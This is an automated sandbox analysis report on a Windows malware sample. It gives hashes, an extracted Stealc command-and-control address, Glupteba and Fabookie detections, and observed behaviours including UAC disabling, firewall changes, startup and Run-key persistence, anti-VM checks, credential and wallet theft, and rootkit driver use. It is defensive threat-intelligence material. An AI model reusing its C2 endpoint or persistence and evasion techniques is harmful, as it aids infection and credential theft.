Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12-01-2024 23:33
Static task
static1
Behavioral task
behavioral1
Sample
48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe
Resource
win7-20231215-en
General
-
Target
48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe
-
Size
5.0MB
-
MD5
f181b08d7d06f955a53a2593b3596991
-
SHA1
c2af74c384c68491121799a8d89b5cd4322c41b2
-
SHA256
48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11
-
SHA512
5784992d21762b523176b3a35e5611916568366fc3abf06cff54c6c1a2b77792f5a50f040facc4b3c786edc31d71b1a41d26a3708483289b3867e949fd515731
-
SSDEEP
49152:lhUCgfFMiW4UnAnkOh9pjA7E9HgFRJ9Tp4mMeJmjMjK0JlUJkGf3yIGul:s9AdHBJmg1wJkGZl
Malware Config
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/memory/4632-173-0x00000000038D0000-0x0000000003A01000-memory.dmp family_fabookie behavioral2/memory/4632-250-0x00000000038D0000-0x0000000003A01000-memory.dmp family_fabookie -
Glupteba payload 6 IoCs
resource yara_rule behavioral2/memory/2044-257-0x0000000002EB0000-0x000000000379B000-memory.dmp family_glupteba behavioral2/memory/2044-258-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/1820-261-0x0000000002DF0000-0x00000000036DB000-memory.dmp family_glupteba behavioral2/memory/1820-262-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2044-327-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral2/memory/2044-353-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 125 5256 powershell.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 2964 netsh.exe 5424 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 9 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i5nzuFhzGEAcyIWTTlWnnPuC.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yNq5YLwq6nMic7QRH1oO5i74.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LCX9Q1uIWE0IdGqkq0BU0tkC.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zsjAzZOCx2UK5zNutpxmDGoZ.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4ptpycTLkpq4gAEtP72n4Uhr.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dUGhfiVBL7UwdDLnOQmyEdNC.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7qZHPaE61ztotN2XEM1Faof4.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DvgQ82YT56DilABg7p1fWuvq.bat jsc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LDHzn12VTVITXHcfVR0P8YJe.bat jsc.exe -
Executes dropped EXE 26 IoCs
pid Process 2044 J8MZqzY86iIMzzByraYnKAlH.exe 1820 KVNZSaD28HGP82BSu04KxHiU.exe 4632 97Jy8NUogrY6pXmCGwHvApBM.exe 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 2144 BroomSetup.exe 4192 nsn5AA5.tmp 2664 ZxIyRlydDx0u0UehgXz9WXlL.exe 4512 Install.exe 2900 Install.exe 2848 dzIJg2BJkMR7TCEjqOzWKHfx.exe 1912 tha95OBw3Tsn7AWPLsWEDL4y.exe 4348 tha95OBw3Tsn7AWPLsWEDL4y.exe 4320 tha95OBw3Tsn7AWPLsWEDL4y.exe 2140 tha95OBw3Tsn7AWPLsWEDL4y.exe 5160 tha95OBw3Tsn7AWPLsWEDL4y.exe 5188 J8MZqzY86iIMzzByraYnKAlH.exe 4524 KVNZSaD28HGP82BSu04KxHiU.exe 884 biTSpsE.exe 5356 WTYqnKL.exe 4940 csrss.exe 5284 injector.exe 2852 Assistant_106.0.4998.16_Setup.exe_sfx.exe 4004 assistant_installer.exe 2120 assistant_installer.exe 5940 windefender.exe 2132 windefender.exe -
Loads dropped DLL 12 IoCs
pid Process 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 4044 riNVBxveUPQ1dduMvr5TXg7i.exe 1912 tha95OBw3Tsn7AWPLsWEDL4y.exe 4348 tha95OBw3Tsn7AWPLsWEDL4y.exe 4320 tha95OBw3Tsn7AWPLsWEDL4y.exe 2140 tha95OBw3Tsn7AWPLsWEDL4y.exe 5160 tha95OBw3Tsn7AWPLsWEDL4y.exe 4004 assistant_installer.exe 4004 assistant_installer.exe 2120 assistant_installer.exe 2120 assistant_installer.exe 4192 nsn5AA5.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000002323f-185.dat upx behavioral2/files/0x000600000002323f-191.dat upx behavioral2/memory/4348-201-0x0000000000D20000-0x0000000001208000-memory.dmp upx behavioral2/files/0x000600000002324e-204.dat upx behavioral2/memory/4320-210-0x0000000000260000-0x0000000000748000-memory.dmp upx behavioral2/memory/5160-220-0x0000000000D20000-0x0000000001208000-memory.dmp upx behavioral2/memory/2140-216-0x0000000000D20000-0x0000000001208000-memory.dmp upx behavioral2/memory/4320-211-0x0000000000260000-0x0000000000748000-memory.dmp upx behavioral2/files/0x000600000002323f-200.dat upx behavioral2/memory/1912-192-0x0000000000D20000-0x0000000001208000-memory.dmp upx behavioral2/memory/5160-248-0x0000000000D20000-0x0000000001208000-memory.dmp upx behavioral2/memory/2140-247-0x0000000000D20000-0x0000000001208000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" J8MZqzY86iIMzzByraYnKAlH.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" csrss.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe -
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json WTYqnKL.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini WTYqnKL.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: tha95OBw3Tsn7AWPLsWEDL4y.exe File opened (read-only) \??\D: tha95OBw3Tsn7AWPLsWEDL4y.exe File opened (read-only) \??\F: tha95OBw3Tsn7AWPLsWEDL4y.exe File opened (read-only) \??\D: tha95OBw3Tsn7AWPLsWEDL4y.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
description ioc Process File opened for modification \??\WinMonFS csrss.exe -
Drops file in System32 directory 25 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 WTYqnKL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini biTSpsE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\49C555742982D57C7C177BAF9E010F56 WTYqnKL.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol biTSpsE.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\49C555742982D57C7C177BAF9E010F56 WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content WTYqnKL.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies WTYqnKL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1460 set thread context of 5076 1460 48b0afb9f404d55c311994ab4da41e3aa6dacd23a1b8e0de1addfe6f9fea4d11.exe 94 -
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
description ioc Process File opened (read-only) \??\VBoxMiniRdrDN KVNZSaD28HGP82BSu04KxHiU.exe File opened (read-only) \??\VBoxMiniRdrDN J8MZqzY86iIMzzByraYnKAlH.exe -
Drops file in Program Files directory 6 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WTYqnKL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WTYqnKL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak WTYqnKL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja WTYqnKL.exe File created C:\Program Files (x86)\VjBUDnCPU\erBWMG.dll WTYqnKL.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi WTYqnKL.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\rss KVNZSaD28HGP82BSu04KxHiU.exe File created C:\Windows\rss\csrss.exe KVNZSaD28HGP82BSu04KxHiU.exe File opened for modification C:\Windows\rss J8MZqzY86iIMzzByraYnKAlH.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\bLyGxHYCYhmZEhkSec.job schtasks.exe File created C:\Windows\Tasks\VeNWzXAjHYHBoCZ.job schtasks.exe File created C:\Windows\rss\csrss.exe J8MZqzY86iIMzzByraYnKAlH.exe File created C:\Windows\windefender.exe csrss.exe File created C:\Windows\Tasks\aKUtYNqNUJyRiHHcg.job schtasks.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1176 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nsn5AA5.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nsn5AA5.tmp -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2676 schtasks.exe 1176 schtasks.exe 6060 schtasks.exe 4692 schtasks.exe 5544 schtasks.exe 4648 schtasks.exe 3624 schtasks.exe 3588 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-105 = "Central Brazilian Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-502 = "Nepal Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2591 = "Tocantins Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" KVNZSaD28HGP82BSu04KxHiU.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" KVNZSaD28HGP82BSu04KxHiU.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e7549030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e19962000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e tha95OBw3Tsn7AWPLsWEDL4y.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 